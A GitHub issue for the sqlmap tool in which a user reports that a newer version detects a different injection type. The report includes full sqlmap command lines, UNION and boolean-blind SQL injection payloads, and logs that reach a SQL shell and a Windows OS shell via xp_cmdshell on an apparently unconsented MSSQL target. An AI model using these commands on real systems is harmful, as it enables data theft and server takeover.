New SQLMAP update providing output that is discrepant to old SQLMAP output using same target request. #827
Assignees
Labels
Comments
emilyanncr
changed the title
emilyanncr
changed the title
|
Rerun with --flush-session util stacked SQLIA is not recognized |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Sooo sqlmap was recently updated and I've come across this situation. The two versions are allowing me to do different things using the same request. For example:
VIA VIA OLD VERSION OF SQLMAP
C:\E\SQLMAP>sqlmap.py -r "C:\Users\Snipercatz\Desktop\request.txt" --time-sec 90 --threads 9 --text-only --no-cast -v 1 -o --sql-shell
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 20:19:39
[20:19:39] [INFO] parsing HTTP request from 'C:\Users\Snipercatz\Desktop\request.txt'
custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q] y
[20:20:06] [INFO] resuming back-end DBMS 'microsoft sql server'
[20:20:07] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Place: (custom) POST
Parameter: #1*
Type: UNION query <---- UNION
Title: Generic UNION query (NULL) - 84 columns
Payload: NameDrop=-1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(114)+CHAR(113)+CHAR(97)+CHAR(113)+CHAR(115)+CHAR(68)+CHAR(122)+CHAR(70)+CHAR(80)+CHAR(112)+CHAR(98)+CHAR(109)+CHAR(85)+CHAR(74)+CHAR(113)+CHAR(112)+CHAR(114)+CHAR(98)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
[20:20:08] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2000
[20:20:08] [INFO] calling Microsoft SQL Server shell. To quit type 'x' or 'q' and press ENTER
sql-shell> <----------------------------------------------------------------------------------------:)
[20:27:19] [INFO] fetched data logged to text files under 'C:\Users\Snipercatz.sqlmap\output\target.com'
[*] shutting down at 20:27:19
SQLMAP MOST RECENT RELEASE
C:\sqlmap\sqlmap-master>sqlmap.py -r "C:\Users\Snipercatz\Desktop\request.txt" --time-sec 90 --threads 9 --text-only --no-cast -v 1 -o --sql-shell
_
___ _| |___ ___ ___ {1.0-dev-nongit-20140912}
|_ -| . | | | .'| . |
|| |||||,| |
|| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 20:28:22
[20:28:22] [INFO] parsing HTTP request from 'C:\Users\Snipercatz\Desktop\request.txt'
custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q] y
[20:28:24] [INFO] resuming back-end DBMS 'microsoft sql server'
[20:28:24] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Place: (custom) POST
Parameter: #1*
Type: boolean-based blind <---- Boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: NameDrop=-3601' OR (1686=1686) AND 'bxnt'='bxnt
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
[20:28:26] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2000
[20:28:26] [INFO] calling Microsoft SQL Server shell. To quit type 'x' or 'q' and press ENTER
sql-shell> <------- ? hmmmm I thought stacked queries weren't identified? Wouldn't you need stacked to call even a sql-shell?
[20:50:40] [INFO] fetched data logged to text files under 'C:\Users\Snipercatz.sqlmap\output\target.com'
[*] shutting down at 20:50:40
VIA REVENTLY OUTDATED VERSION OF SQLMAP
C:\E\SQLMAP>sqlmap/py -r "C:\Users\Snipercatz\Desktop\request.txt" --time-sec 90 --threads 9 --text-only --no-cast -v 1 -o --os-shell
'sqlmap' is not recognized as an internal or external command,
operable program or batch file.
C:\E\SQLMAP>sqlmap.py -r "C:\Users\Snipercatz\Desktop\request.txt" --time-sec 90 --threads 9 --no-cast --text-only -v 1 -o --os-shell
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 20:53:41
[20:53:41] [INFO] parsing HTTP request from 'C:\Users\Snipercatz\Desktop\request.txt'
custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q] y
[20:53:42] [INFO] resuming back-end DBMS 'microsoft sql server'
[20:53:42] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Place: (custom) POST
Parameter: #1*
Type: UNION query
Title: Generic UNION query (NULL) - 84 columns
Payload: NameDrop=-1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(114)+CHAR(113)+CHAR(97)+CHAR(113)+CHAR(115)+CHAR(68)+CHAR(122)+CHAR(70)+CHAR(80)+CHAR(112)+CHAR(98)+CHAR(109)+CHAR(85)+CHAR(74)+CHAR(113)+CHAR(112)+CHAR(114)+CHAR(98)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
[20:53:44] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2000
[20:53:44] [INFO] testing if current user is DBA
[20:53:44] [WARNING] time-based comparison requires larger statistical model, please wait..............................
[20:54:14] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[20:54:15] [INFO] testing if xp_cmdshell extended procedure is usable
[20:54:18] [WARNING] something went wrong with full UNION technique (most probably because of limitation on retrieved number of entries). Falling back to partial UNION technique
[20:54:19] [WARNING] the SQL query provided does not return any output
[20:54:19] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[20:54:23] [ERROR] unable to retrieve xp_cmdshell output
[20:54:23] [INFO] going to use xp_cmdshell extended procedure for operating system command execution
[20:54:23] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> <-------- :)
VIA MOST RECENT UPDATE OF SQLMAP
C:\sqlmap\sqlmap-master>sqlmap.py -r "C:\Users\Snipercatz\Desktop\request.txt" --time-sec 90 --threads 9 --text-only --no-cast -v 1 -o --os-shell
_
___ _| |___ ___ ___ {1.0-dev-nongit-20140912}
|_ -| . | | | .'| . |
|| |||||,| |
|| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 20:51:27
[20:51:27] [INFO] parsing HTTP request from 'C:\Users\Snipercatz\Desktop\request.txt'
custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q] y
[20:51:29] [INFO] resuming back-end DBMS 'microsoft sql server'
[20:51:29] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Place: (custom) POST
Parameter: #1*
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: NameDrop=-3601' OR (1686=1686) AND 'bxnt'='bxnt
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
[20:51:30] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2000
[20:51:30] [CRITICAL] unable to prompt for an interactive operating system shell via the back-end DBMS because stacked queries SQL injection is not supported
[*] shutting down at 20:51:30
The text was updated successfully, but these errors were encountered: